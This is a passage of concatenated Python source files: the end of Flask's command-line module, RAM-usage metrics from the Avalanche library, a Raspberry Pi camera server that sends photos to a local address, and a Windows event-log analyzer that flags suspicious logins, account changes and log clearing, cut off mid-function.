"""Click option type for the ``--cert`` option. Allows either an
existing file, the string ``'adhoc'``, or an import for a
:class:`~ssl.SSLContext` object.
"""
name = "path"
def __init__(self):
self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True)
def convert(self, value, param, ctx):
if ssl is None:
raise click.BadParameter(
'Using "--cert" requires Python to be compiled with SSL support.',
ctx,
param,
)
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == "adhoc":
try:
import OpenSSL # noqa: F401
except ImportError:
raise click.BadParameter(
"Using ad-hoc certificates requires pyOpenSSL.", ctx, param
)
return value
obj = import_string(value, silent=True)
if sys.version_info < (2, 7, 9):
if obj:
return obj
else:
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx, param, value):
"""The ``--key`` option must be specified when ``--cert`` is a file.
Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
"""
cert = ctx.params.get("cert")
is_adhoc = cert == "adhoc"
if sys.version_info < (2, 7, 9):
is_context = cert and not isinstance(cert, (text_type, bytes))
else:
is_context = isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.', ctx, param
)
if is_context:
raise click.BadParameter(
'When "--cert" is an SSLContext object, "--key is not used.', ctx, param
)
if not cert:
raise click.BadParameter('"--cert" must also be specified.', ctx, param)
ctx.params["cert"] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter('Required when using "--cert".', ctx, param)
return value
class SeparatedPathType(click.Path):
"""Click option type that accepts a list of values separated by the
OS's path separator (``:``, ``;`` on Windows). Each value is
validated as a :class:`click.Path` type.
"""
def convert(self, value, param, ctx):
items = self.split_envvar_value(value)
super_convert = super(SeparatedPathType, self).convert
return [super_convert(item, param, ctx) for item in items]
@click.command("run", short_help="Run a development server.")
@click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.")
@click.option("--port", "-p", default=5000, help="The port to bind to.")
@click.option(
"--cert", type=CertParamType(), help="Specify a certificate file to use HTTPS."
)
@click.option(
"--key",
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key,
expose_value=False,
help="The key file to use when specifying a certificate.",
)
@click.option(
"--reload/--no-reload",
default=None,
help="Enable or disable the reloader. By default the reloader "
"is active if debug is enabled.",
)
@click.option(
"--debugger/--no-debugger",
default=None,
help="Enable or disable the debugger. By default the debugger "
"is active if debug is enabled.",
)
@click.option(
"--eager-loading/--lazy-loader",
default=None,
help="Enable or disable eager loading. By default eager "
"loading is enabled if the reloader is disabled.",
)
@click.option(
"--with-threads/--without-threads",
default=True,
help="Enable or disable multithreading.",
)
@click.option(
"--extra-files",
default=None,
type=SeparatedPathType(),
help=(
"Extra files that trigger a reload on change. Multiple paths"
" are separated by '{}'.".format(os.path.pathsep)
),
)
@pass_script_info
def run_command(
info, host, port, reload, debugger, eager_loading, with_threads, cert, extra_files
):
"""Run a local development server.
This server is for development purposes only. It does not provide
the stability, security, or performance of production WSGI servers.
The reloader and debugger are enabled by default if
FLASK_ENV=development or FLASK_DEBUG=1.
"""
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
if eager_loading is None:
eager_loading = not reload
show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
from werkzeug.serving import run_simple
run_simple(
host,
port,
app,
use_reloader=reload,
use_debugger=debugger,
threaded=with_threads,
ssl_context=cert,
extra_files=extra_files,
)
@click.command("shell", short_help="Run a shell in the app context.")
@with_appcontext
def shell_command():
"""Run an interactive Python shell in the context of a given
Flask application. The application will populate the default
namespace of this shell according to it's configuration.
This is useful for executing small snippets of management code
without having to manually configure the application.
"""
import code
from .globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = "Python %s on %s\nApp: %s [%s]\nInstance: %s" % (
sys.version,
sys.platform,
app.import_name,
app.env,
app.instance_path,
)
ctx = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get("PYTHONSTARTUP")
if startup and os.path.isfile(startup):
with open(startup, "r") as f:
eval(compile(f.read(), startup, "exec"), ctx)
ctx.update(app.make_shell_context())
code.interact(banner=banner, local=ctx)
@click.command("routes", short_help="Show the routes for the app.")
@click.option(
"--sort",
"-s",
type=click.Choice(("endpoint", "methods", "rule", "match")),
default="endpoint",
help=(
'Method to sort routes by. "match" is the order that Flask will match '
"routes when dispatching a request."
),
)
@click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.")
@with_appcontext
def routes_command(sort, all_methods):
"""Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo("No routes were registered.")
return
ignored_methods = set(() if all_methods else ("HEAD", "OPTIONS"))
if sort in ("endpoint", "rule"):
rules = sorted(rules, key=attrgetter(sort))
elif sort == "methods":
rules = sorted(rules, key=lambda rule: sorted(rule.methods))
rule_methods = [", ".join(sorted(rule.methods - ignored_methods)) for rule in rules]
headers = ("Endpoint", "Methods", "Rule")
widths = (
max(len(rule.endpoint) for rule in rules),
max(len(methods) for methods in rule_methods),
max(len(rule.rule) for rule in rules),
)
widths = [max(len(h), w) for h, w in zip(headers, widths)]
row = "{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}".format(*widths)
click.echo(row.format(*headers).strip())
click.echo(row.format(*("-" * width for width in widths)))
for rule, methods in zip(rules, rule_methods):
click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
cli = FlaskGroup(
help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd="export" if os.name == "posix" else "set",
prefix="$ " if os.name == "posix" else "> ",
)
)
def main(as_module=False):
# TODO omit sys.argv once https://github.com/pallets/click/issues/536 is fixed
cli.main(args=sys.argv[1:], prog_name="python -m flask" if as_module else None)
if __name__ == "__main__":
main(as_module=True)
|
ram_usage.py
|
################################################################################
# Copyright (c) 2021 ContinualAI. #
# Copyrights licensed under the MIT License. #
# See the accompanying LICENSE file for terms. #
# #
# Date: 19-01-2021 #
# Author(s): Vincenzo Lomonaco, Lorenzo Pellegrini #
# E-mail: contact@continualai.org #
# Website: www.continualai.org #
################################################################################
import os
import time
from typing import Optional, List, TYPE_CHECKING
from threading import Thread
from psutil import Process
from avalanche.evaluation import Metric, PluginMetric, GenericPluginMetric
from avalanche.evaluation.metric_results import MetricResult
if TYPE_CHECKING:
from avalanche.training import BaseStrategy
class MaxRAM(Metric[float]):
"""
The standalone RAM usage metric.
Important: this metric approximates the real maximum RAM usage since
it sample at discrete amount of time the RAM values.
Instances of this metric keeps the maximum RAM usage detected.
The `start_thread` method starts the usage tracking.
The `stop_thread` method stops the tracking.
The result, obtained using the `result` method, is the usage in mega-bytes.
The reset method will bring the metric to its initial state. By default
this metric in its initial state will return an usage value of 0.
"""
def __init__(self, every=1):
"""
Creates an instance of the RAM usage metric.
:param every: seconds after which update the maximum RAM
usage
"""
self._process_handle: Optional[Process] = Process(os.getpid())
"""
The process handle, lazily initialized.
"""
self.every = every
self.stop_f = False
"""
Flag to stop the thread
"""
self.max_usage = 0
"""
Main metric result. Max RAM usage.
"""
self.thread = None
"""
Thread executing RAM monitoring code
"""
def _f(self):
"""
Until a stop signal is encountered,
this function monitors each `every` seconds
the maximum amount of RAM used by the process
"""
start_time = time.monotonic()
while not self.stop_f:
# ram usage in MB
ram_usage = self._process_handle.memory_info().rss / 1024 / 1024
if ram_usage > self.max_usage:
self.max_usage = ram_usage
time.sleep(self.every - ((time.monotonic() - start_time)
% self.every))
def result(self) -> Optional[float]:
"""
Retrieves the RAM usage.
Calling this method will not change the internal state of the metric.
:return: The average RAM usage in bytes, as a float value.
"""
return self.max_usage
def start_thread(self):
assert not self.thread, "Trying to start thread " \
"without joining the previous."
self.thread = Thread(target=self._f, daemon=True)
self.thread.start()
def stop_thread(self):
if self.thread:
self.stop_f = True
self.thread.join()
self.stop_f = False
self.thread = None
def reset(self) -> None:
"""
Resets the metric.
:return: None.
"""
self.max_usage = 0
def update(self):
pass
class RAMPluginMetric(GenericPluginMetric[float]):
def __init__(self, every, reset_at, emit_at, mode):
self._ram = MaxRAM(every)
super(RAMPluginMetric, self).__init__(
self._ram, reset_at, emit_at, mode)
def update(self, strategy):
self._ram.update()
class MinibatchMaxRAM(RAMPluginMetric):
"""
The Minibatch Max RAM metric.
This plugin metric only works at training time.
"""
def __init__(self, every=1):
"""
Creates an instance of the Minibatch Max RAM metric
:param every: seconds after which update the maximum RAM
usage
"""
super(MinibatchMaxRAM, self).__init__(
every, reset_at='iteration', emit_at='iteration', mode='train')
def before_training(self, strategy: 'BaseStrategy') \
-> None:
super().before_training(strategy)
self._ram.start_thread()
def after_training(self, strategy: 'BaseStrategy') -> None:
super().after_training(strategy)
self._ram.stop_thread()
def __str__(self):
return "MaxRAMUsage_MB"
class EpochMaxRAM(RAMPluginMetric):
"""
The Epoch Max RAM metric.
This plugin metric only works at training time.
"""
def __init__(self, every=1):
"""
Creates an instance of the epoch Max RAM metric.
:param every: seconds after which update the maximum RAM
usage
"""
super(EpochMaxRAM, self).__init__(
every, reset_at='epoch', emit_at='epoch', mode='train')
def before_training(self, strategy: 'BaseStrategy') \
-> None:
super().before_training(strategy)
self._ram.start_thread()
def after_training(self, strategy: 'BaseStrategy') -> None:
super().before_training(strategy)
self._ram.stop_thread()
def __str__(self):
return "MaxRAMUsage_Epoch"
class ExperienceMaxRAM(RAMPluginMetric):
"""
The Experience Max RAM metric.
This plugin metric only works at eval time.
"""
def __init__(self, every=1):
"""
Creates an instance of the Experience CPU usage metric.
:param every: seconds after which update the maximum RAM
usage
"""
super(ExperienceMaxRAM, self).__init__(
every, reset_at='experience', emit_at='experience', mode='eval')
def before_eval(self, strategy: 'BaseStrategy') \
-> None:
super().before_eval(strategy)
self._ram.start_thread()
def after_eval(self, strategy: 'BaseStrategy') -> None:
super().after_eval(strategy)
self._ram.stop_thread()
def __str__(self):
return "MaxRAMUsage_Experience"
class StreamMaxRAM(RAMPluginMetric):
"""
The Stream Max RAM metric.
This plugin metric only works at eval time.
"""
def __init__(self, every=1):
"""
Creates an instance of the Experience CPU usage metric.
:param every: seconds after which update the maximum RAM
usage
"""
super(StreamMaxRAM, self).__init__(
every, reset_at='stream', emit_at='stream', mode='eval')
def before_eval(self, strategy) -> MetricResult:
super().before_eval(strategy)
self._ram.start_thread()
def after_eval(self, strategy: 'BaseStrategy') \
-> MetricResult:
packed = super().after_eval(strategy)
self._ram.stop_thread()
return packed
def __str__(self):
return "MaxRAMUsage_Stream"
def ram_usage_metrics(*, every=1, minibatch=False, epoch=False,
experience=False, stream=False) -> List[PluginMetric]:
"""
Helper method that can be used to obtain the desired set of
plugin metrics.
:param every: seconds after which update the maximum RAM
usage
:param minibatch: If True, will return a metric able to log the minibatch
max RAM usage.
:param epoch: If True, will return a metric able to log the epoch
max RAM usage.
:param experience: If True, will return a metric able to log the experience
max RAM usage.
:param stream: If True, will return a metric able to log the evaluation
max stream RAM usage.
:return: A list of plugin metrics.
"""
metrics = []
if minibatch:
metrics.append(MinibatchMaxRAM(every=every))
if epoch:
metrics.append(EpochMaxRAM(every=every))
if experience:
metrics.append(ExperienceMaxRAM(every=every))
if stream:
metrics.append(StreamMaxRAM(every=every))
return metrics
__all__ = [
'MaxRAM',
'MinibatchMaxRAM',
'EpochMaxRAM',
'ExperienceMaxRAM',
'StreamMaxRAM',
'ram_usage_metrics'
]
|
camera_2.py
|
#!/usr/bin/env python3
from flask import Flask, send_file
from PIL import Image
import RPi.GPIO as GPIO
from time import sleep
from picamera import PiCamera
from queue import Queue
from threading import Thread
import requests
from time import time
from io import BytesIO
LED_PIN = 16 # Broadcom pin 23 (P1 pin 16)
queue = Queue()
camera = None
app = Flask(__name__)
def setup_pi():
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BOARD)
GPIO.setup(LED_PIN, GPIO.OUT) # LED pin set as output
GPIO.output(LED_PIN, GPIO.LOW)
def setup_camera():
camera = PiCamera()
camera.resolution = (3280, 2464)
camera.sharpness = 100
camera.awb_mode = "auto"
camera.image_effect = "colorbalance"
camera.image_effect_params = (256.0, 256.0, 256.0)
camera.saturation = -100
return camera
def send_image(queue):
while queue.get():
with capture() as stream:
requests.post(
"http://192.168.0.151:5000/send-picture",
files={"image": stream, "mimetype": "image/jpeg"},
)
def capture():
with BytesIO() as read_stream:
GPIO.output(LED_PIN, GPIO.HIGH)
sleep(2)
camera.capture(read_stream, "jpeg")
GPIO.output(LED_PIN, GPIO.LOW)
read_stream.seek(0)
image = Image.open(read_stream).rotate(90)
write_stream = BytesIO()
image.save(write_stream, "JPEG")
write_stream.seek(0)
return write_stream
@app.route("/get-picture", methods=["GET"])
def getPicture():
with capture() as stream:
return send_file(stream, mimetype="image/jpeg")
@app.route("/pir", methods=["GET"])
def pir_signal_handler():
queue.put(time())
return "200"
if __name__ == "__main__":
try:
setup_pi()
camera = setup_camera()
Thread(target=send_image, args=((queue),), daemon=True).start()
app.run(host="0.0.0.0", port=5000, debug=False)
finally:
camera.close()
GPIO.cleanup()
|
LogAnalyzeLogs.py
|
import threading
import re
import datetime
import LogAnalyzeDBOps as db
import Messages as MSG
import datetime
logonID = '0x785E60E' # Admin actions
linkedLogonID = '0x78B8C4B' # Other actions
# logonID = '0x78B8C68' # Admin actions
# linkedLogonID = '0x78B8C4B' # Other actions
# logonID = '0x1E6C1F95' # Admin actions
# logonID = '0x7E94155' # Admin actions
# linkedLogonID = '0x1E6C1FFB' # Other actions
def analyzeLogs(storeName):
reportId = storeName + '_' + str(datetime.datetime.now()).replace(' ', '_') + '_' + str(logonID)
print('Start...')
print('1...')
getPolicyChangeEventStatus(storeName, reportId)
print('2...')
getWrongAccountPassword(storeName, reportId)
print('3...')
getAddAccountEventStatus(storeName, reportId)
print('4...')
getDelAccountEventStatus(storeName, reportId)
print('5...')
getEventLogsDeleteEvent(storeName, reportId)
print('6...')
getTryRunWithoutAccess(storeName, reportId)
print('7...')
fillInTheUnknowLogs(storeName, reportId)
print('8...')
getPrintDate(storeName, reportId)
print('Done...')
def getForensicData(logData, whatData, howEventIdSeq, whyStmt):
# print(logData)
forensics = {
'who': '',
'fromwhere': '',
'when': '',
'what': whatData,
'how': howEventIdSeq,
'why': whyStmt
}
if logData == -1: return forensics
forensics['when'] = logData['TimeCreated']
# who
if logData['Message'].__contains__('New Logon'):
tmpNewLogOnData = str(logData['Message'])
tmpNewLogOnData = tmpNewLogOnData[tmpNewLogOnData.index('New Logon'):]
tmpNewLogOnDataSID = tmpNewLogOnData[tmpNewLogOnData.index('Security ID'):tmpNewLogOnData.index('\n', tmpNewLogOnData.index('Security ID'))]
tmpNewLogOnDataName = tmpNewLogOnData[tmpNewLogOnData.index('Account Name'):tmpNewLogOnData.index('\n', tmpNewLogOnData.index('Account Name'))]
tmpNewLogOnDataName = tmpNewLogOnDataName.replace('\t', '').replace('\n', '').replace('\r', '')
tmpNewLogOnDataSID = tmpNewLogOnDataSID.replace('\t', '').replace('\n', '').replace('\r', '')
forensics['who'] = tmpNewLogOnDataName + ' (' + tmpNewLogOnDataSID + ')'
else:
try:
tmpNewLogOnData = str(logData['Message'])
tmpNewLogOnData = tmpNewLogOnData[tmpNewLogOnData.index('Subject'):]
tmpNewLogOnDataSID = tmpNewLogOnData[tmpNewLogOnData.index('Security ID'):tmpNewLogOnData.index('\n', tmpNewLogOnData.index('Security ID'))]
tmpNewLogOnDataName = tmpNewLogOnData[tmpNewLogOnData.index('Account Name'):tmpNewLogOnData.index('\n', tmpNewLogOnData.index('Account Name'))]
tmpNewLogOnDataName = tmpNewLogOnDataName.replace('\t', '').replace('\n', '').replace('\r', '')
tmpNewLogOnDataSID = tmpNewLogOnDataSID.replace('\t', '').replace('\n', '').replace('\r', '')
forensics['who'] = tmpNewLogOnDataName + ' (' + tmpNewLogOnDataSID + ')'
except:
try:
tmpNewLogOnData = str(logData['Message'])
tmpNewLogOnData = tmpNewLogOnData[tmpNewLogOnData.index('Logon Account'):]
tmpNewLogOnDataSID = tmpNewLogOnData[tmpNewLogOnData.index('Logon Account'):tmpNewLogOnData.index('\n', tmpNewLogOnData.index('Logon Account'))]
tmpNewLogOnDataSID = tmpNewLogOnDataSID.replace('\t', '').replace('\n', '').replace('\r', '')
forensics['who'] = tmpNewLogOnDataSID
except: # Print Document owned by
tmpNewLogOnData = str(logData['Message'])
tmpNewLogOnData = tmpNewLogOnData[tmpNewLogOnData.index('Print Document owned by') + len('Print Document owned by'):].strip(' ')
userName = tmpNewLogOnData.split(' ')[0]
forensics['who'] = userName
# fromwhere
if logData['Message'].__contains__('Network Information'):
tmpNewLogOnData = str(logData['Message'])
tmpNewLogOnData = tmpNewLogOnData[tmpNewLogOnData.index('Network Information'):]
tmpNewLogOnDataSID = tmpNewLogOnData[tmpNewLogOnData.index('Network Address'):tmpNewLogOnData.index('\n', tmpNewLogOnData.index('Network Address'))]
tmpNewLogOnDataName = tmpNewLogOnData[tmpNewLogOnData.index('Port'):tmpNewLogOnData.index('\n', tmpNewLogOnData.index('Port'))]
tmpNewLogOnDataName = tmpNewLogOnDataName.replace('\t', '').replace('\n', '').replace('\r', '')
tmpNewLogOnDataSID = tmpNewLogOnDataSID.replace('\t', '').replace('\n', '').replace('\r', '')
forensics['fromwhere'] = tmpNewLogOnDataSID + ' :' + tmpNewLogOnDataName
elif logData['Message'].__contains__('Print Document owned by'): # Class Driver through port 192.168.0.19
tmpNewLogOnData = str(logData['Message'])
tmpNewLogOnData = tmpNewLogOnData[tmpNewLogOnData.index('Class Driver through port') + len('Class Driver through port'):].strip(' ').strip('.')
ip = tmpNewLogOnData.split(' ')[0]
forensics['fromwhere'] = ip
else:
forensics['fromwhere'] = 'localhost'
# for k in forensics:
# print(k, forensics[k])
return forensics
# When someone changes audit policy
def getPolicyChangeEventStatus(storeName, reportId):
res = db.getLogDataUsingQuery(storeName, 'Id', ["4719"])
for i in range(0, len(res)):
msg = res[i]['Message']
if msg.__contains__(logonID) or msg.__contains__(linkedLogonID): # insertReport(log, status, reportId, reportMsg)
accMsg = msg
accMsg = accMsg[accMsg.index('Account Name') + len('Account Name:'):accMsg.index('Account Domain')].replace('\t', '')
accMsg = accMsg[:len(accMsg)-2]
msg = msg[msg.index('Category'):].replace('\t', '')
db.insertReport(
res[i],
MSG.STATUS_SUSPICIOUS,
reportId,
(MSG.SUSP_POLICY_CHANGE % accMsg) + '\n' + str(msg),
getForensicData(res[i], "Policy Change", "4719", "Integrity Breach")
)
# When someone is getting the account password wrong
def getWrongAccountPassword(storeName, reportId):
cnt = 0
res = db.getLogDataUsingQuery(storeName, 'Id', ["4776", "4625"])
userName = {}
for i in range(0, len(res) - 1):
if res[i]['Id'] == "4776" and res[i+1]['Id'] == "4625":
# if res[i]['Id'] == 4625:
# cnt += 1
msg = res[i + 1]['Message']
msg = msg[msg.index('Account For Which Logon Failed'):msg.index('Failure Information:') - 3]
msg = msg.replace('\t', '').replace('\r', '')
msg = msg[msg.index('Account Name:') + len('Account Name:'):msg.index('\n', msg.index('Account Name:'))]
if msg not in userName.keys():
userName[msg] = 1
else:
userName[msg] = userName[msg] + 1
for usr in userName.keys():
if userName[usr] > 2:
for i in range(0, len(res)):
# if res[i]['Id'] == 4776 and res[i + 1]['Id'] == 4625 and res[i]['Message'].__contains__(usr) and res[i+1]['Message'].__contains__(usr):
if res[i]['Message'].__contains__(usr):
if res[i]['Id'] == "4625":
msg = res[i]['Message']
msg = msg[msg.index('Account For Which Logon Failed'):msg.index('Failure Information:') - 3]
msg = msg.replace('\t', '').replace('\r', '')
db.insertReport(
res[i],
MSG.STATUS_THREAT,
reportId,
(MSG.THRT_WRONG_PASSWD_LOGIN) + '\n' + str(msg),
getForensicData(res[i], "Logon Failure", "4776;4625", "Breach of Availability.")
)
else:
db.insertReport(res[i], MSG.STATUS_THREAT, reportId, (MSG.THRT_WRONG_PASSWD_LOGIN) + '\n' + str(res[i]['Message']), getForensicData(res[i], "Logon Failure", "4776;4625", "Breach of Availability."))
else:
i = 0
for i in range(0, len(res)):
# if res[i]['Id'] == 4776 and res[i + 1]['Id'] == 4625 and res[i]['Message'].__contains__(usr) and res[i+1]['Message'].__contains__(usr):
if res[i]['Message'].__contains__(usr):
if res[i]['Id'] == "4625":
msg = res[i]['Message']
msg = msg[msg.index('Account For Which Logon Failed'):msg.index('Failure Information:') - 3]
msg = msg.replace('\t', '').replace('\r', '')
db.insertReport(res[i], MSG.STATUS_SUSPICIOUS, reportId, (MSG.THRT_WRONG_PASSWD_LOGIN) + '\n' + str(msg), getForensicData(res[i], "Logon Failure", "4776;4625", "Confidentiality"))
else:
db.insertReport(res[i], MSG.STATUS_SUSPICIOUS, reportId, (MSG.THRT_WRONG_PASSWD_LOGIN) + '\n' + str(res[i]['Message']), getForensicData(res[i], "Logon Failure", "4776;4625", "Confidentiality"))
# When someone created a new account in a workstation
def getAddAccountEventStatus(storeName, reportId):
res = db.getLogDataUsingQuery(storeName, 'Id', ["4793", "4728", "4720", "4722"])
res = res[::-1]
for i in range(0, len(res), 4): # (4793, 4728, 4720, 4722)
if res[i]['Id'] == "4793" and res[i+1]['Id'] == "4728" and res[i+2]['Id'] == "4720" and res[i+3]['Id'] == "4722":
if res[i]['Message'].__contains__(logonID) and res[i+1]['Message'].__contains__(logonID) and \
res[i+2]['Message'].__contains__(logonID) and res[i+3]['Message'].__contains__(logonID):
adminAccMsg = res[i]['Message']
adminAccName = adminAccMsg[adminAccMsg.index('Account Name:') + len('Account Name:'):adminAccMsg.\
index('\n', adminAccMsg.index('Account Name:'))].replace('\t', '').replace('\r', '')
desktopName = adminAccMsg[adminAccMsg.index('Caller Workstation:') + len('Caller Workstation:'):adminAccMsg.\
index('\n', adminAccMsg.index('Caller Workstation:'))].replace('\t', '').replace('\r', '')
newUserMsg = res[i+2]['Message']
newUserName = newUserMsg[newUserMsg.index('New Account'):].replace('\t', '').replace('\r', '')
newUserName = newUserName[newUserName.index('Account Name:'):newUserName.index('Attributes')].strip('\n')
db.insertReport(res[i], MSG.STATUS_SUSPICIOUS, reportId,
(MSG.SUSP_NEW_ACCOUNT_CREATED % (newUserName, adminAccName, desktopName)), getForensicData(res[i], "Add New Account", "4793;4728;4720;4722", "Confidentiality"))
db.insertReport(res[i+1], MSG.STATUS_SUSPICIOUS, reportId,
(MSG.SUSP_NEW_ACCOUNT_CREATED % (newUserName, adminAccName, desktopName)), getForensicData(res[i+1], "Add New Account", "4793;4728;4720;4722", "Confidentiality"))
db.insertReport(res[i+2], MSG.STATUS_SUSPICIOUS, reportId,
(MSG.SUSP_NEW_ACCOUNT_CREATED % (newUserName, adminAccName, desktopName)), getForensicData(res[i+2], "Add New Account", "4793;4728;4720;4722", "Confidentiality"))
db.insertReport(res[i+3], MSG.STATUS_SUSPICIOUS, reportId,
(MSG.SUSP_NEW_ACCOUNT_CREATED % (newUserName, adminAccName, desktopName)), getForensicData(res[i+3], "Add New Account", "4793;4728;4720;4722", "Confidentiality"))
# When someone deletes a user account in a workstation
def getDelAccountEventStatus(storeName, reportId):
res = db.getLogDataUsingQuery(storeName, 'Id', ["4733", "4729", "4726"])
res = res[::-1]
accntRemoved = {}
for i in range(0, len(res)): # (4733, 4729, 4726)
if res[i]['Id'] == "4726":
msg = res[i]['Message']
msg = msg[msg.index('Target Account:') + len('Target Account:'):msg.index('Additional Information')]
msg = msg.replace('\t', '')
securityId = msg[msg.index('Security ID:') + len('Security ID:'):msg.index('\n', msg.index('Security ID:'))]
securityId = securityId.replace('\r', '')
accName = msg[msg.index('Account Name:') + len('Account Name:'):msg.index('\n', msg.index('Account Name:'))]
accName = accName.replace('\t', '').replace('\r', '')
accntRemoved[accName] = securityId
for acc in accntRemoved.keys():
for i in range(0, len(res)):
if res[i]['Message'].__contains__(accntRemoved[acc]) and res[i]['Message'].__contains__(logonID):
msg = res[i]['Message']
msg = msg[msg.index('Account Name:'):msg.index('Logon ID')].replace('\t', '').replace('\r', '')
msg = msg.replace('Account Domain', 'Workstation')
db.insertReport(res[i], MSG.STATUS_SUSPICIOUS, reportId, (MSG.SUSP_ACCOUNT_DELETED % (acc, msg)), getForensicData(res[i], "Delete User Account", "4733;4729;4726", "Confidentiality"))
# When someone deletes log events
def getEventLogsDeleteEvent(storeName, reportId):
res = db.getLogDataUsingQuery(storeName, 'Id', ['1102'])
res = res[::-1]
accntRemoved = {}
for i in range(0, len(res)):
msg = res[i]['Message']
msg = msg[msg.index('Account Name:'):msg.index('Logon ID:')].replace('\t', '').replace('\r', '').strip('\n')
# print(MSG.ATTCK_LOG_CLEAR % msg)
db.insertReport(res[i], MSG.STATUS_ATTACK, reportId, (MSG.ATTCK_LOG_CLEAR % msg), getForensicData(res[i], "Delete User Account", "1102", "Breach of Availability."))
# When someone tries to open/run a file without permission
def getTryRunWithoutAccess(storeName, reportId):
fileList = []
res = db.getFailedObjectAccessLogs(storeName)
for i in range(0, len(res)):
accName = ''
lid = ''
obj = ''
if res[i]['Id'] == "4656":
msg = res[i]['Message']
msg = msg[msg.index('Account Name:') + len('Account Name:'):].strip('\t')
accName = msg[:msg.index('\n')].replace('\t', '').replace('\r', '')
msg = msg[msg.index('Logon ID:') + len('Logon ID:'):].strip('\t')
lid = msg[:msg.index('\n')].replace('\t', '').replace('\r', '')
msg = msg[msg.index('Object Name:') + len('Object Name:'):].strip('\t')
obj = msg[:msg.index('\n')].replace('\t', '').replace('\r', '')
if obj.__contains__(':'):
if len(fileList) == 0:
fileList.append([accName, lid, obj, 1])
else:
there = False
for f in fileList:
if f[0] == accName and f[1] == lid and f[2] == obj:
cnt = f[3]
f[3] = cnt + 1
there = True
if not there:
fileList.append([accName, lid, obj, 1])
for f in fileList:
if f[3] > 6: # ['Subhamoy', '0xA437DA', 'G:\\task\\xyz_norights.txt', 54]
for i in range(0, len(res)):
if res[i]['Message'].__contains__(f[0]) and res[i]['Message'].__contains__(f[1]) and \
res[i]['Message'].__contains__(f[2]):
db.insertReport(res[i], MSG.STATUS_THREAT, reportId, MSG.THRT_UNWANTED_ACCESS_TRY % (f[0], f[2]), getForensicData(res[i], "Failure Unwanted Access Try Multiple", "4656;4656;4656;4656;4656;4656", "Confidentiality")) # log, status, reportId, reportMsg
else:
for i in range(0, len(res)):
if res[i]['Message'].__contains__(f[0]) and res[i]['Message'].__contains__(f[1]) and \
res[i]['Message'].__contains__(f[2]):
db.insertReport(res[i], MSG.STATUS_SUSPICIOUS, reportId, MSG.SUSP_UNWANTED_ACCESS_TRY % (f[0], f[2]), getForensicData(res[i], "Unwanted Access Try", "4656", "Confidentiality")) # log, status, reportId, reportMsg
logs = db.getSuccessObjectAccessLogs(storeName)
# print(fileList)
for i in range(0, len(res)):
msg = res[i]['Message']
for f in fileList: # ['Subhamoy', '0xA437DA', 'G:\\task\\xyz_norights.txt', 54]
if f[2].__contains__(':'):
if msg.__contains__(f[0]) and msg.__contains__(f[1]) and msg.__contains__(f[2]):
db.insertReport(res[i], MSG.STATUS_ATTACK, reportId, MSG.ATTCK_UNWANTED_ACCESS % (f[0], f[2]), getForensicData(res[i], "Success Unwanted Access Try Multiple", "4656", "Breach of Confidentiality"))
# db.insertReport(res[i], MSG.STATUS_ATTACK, reportId, (MSG.ATTCK_LOG_CLEAR % msg))
# When a document is printed
def getPrintDate(storeName, reportId):
res = db.getPrintLogs(storeName)
for i in range(0, len(res)):
db.insertReport(res[i], MSG.STATUS_SUSPICIOUS, reportId, 'Document was printed.', getForensicData(res[i], "Document Printed", "307", "Confidentiality"))
# Fill in the other logs in the log store currently not taken into consideration
def fillInTheUnknowLogs(storeName, reportId):
logids = db.getKnownLogIds(reportId)
logs = list(db.getLogDate(storeName)) # 241
if len(logs) > 100:
x = 100
else:
x = len(logs)
for i in range(0, x):
if logs[i]['_id'] in logids:
continue
db.insertReport(logs[i], MSG.STATUS_GEN, reportId, 'OK', getForensicData(-1, "", "", ""))
def getSessionIDs():
sesIds = []
data = db.getAllLogs('wintest')
for log in data:
securityId = ''
loginId = ''
if log['Message'].__contains__('Security ID'):
tmpMsgSID = log['Message']
tmpMsgSID = tmpMsgSID[tmpMsgSID.index('Security ID'):tmpMsgSID.index('\n', tmpMsgSID.index('Security ID'))]
securityId = tmpMsgSID.replace('\t', '').replace('\n', '').replace('\r', '')
if log['Message'].__contains__('Logon ID'):
tmpMsgLID = log['Message']
try:
tmpMsgLID = tmpMsgLID[tmpMsgLID.index('Logon ID'):tmpMsgLID.index('\n', tmpMsgLID.index('Logon ID'))]
except:
tmpMsgLID = tmpMsgLID[tmpMsgLID.index('Logon ID'):]
loginId = tmpMsgLID.replace('\t', '').replace('\n', '').replace('\r', '')
if loginId not in sesIds and len(securityId.split('-')) > 6:
print(str(log['TimeCreated']))
print(securityId)
print(loginId)
sesIds.append(loginId)
print('************************************')
print(len(sesIds))
# if __name__ == '__main__':
# analyzeLogs('wintest')
# # analyzeLogs('a2')
# # fillInTheUnknowLogs('home-log', 'home-log_2019-08-07_16:45:59.625541_0x1E6C1F95')
def getLoginSessions(storeName):
eventId = ["4648", "4624"]
res = db.getLogDataUsingQuery(storeName, 'Id', eventId)
sessionIDs = []
for i in range(0, len(res)):
msg = res[i]['Message']
try:
msg = msg[msg.index('New Logon:'):msg.index('Logon GUID')]
msg = msg[msg.index('Logon ID'):msg.index('Network Account Name')]
msg = re.split('\r', msg)
logonId = (msg[0]).strip('\n')
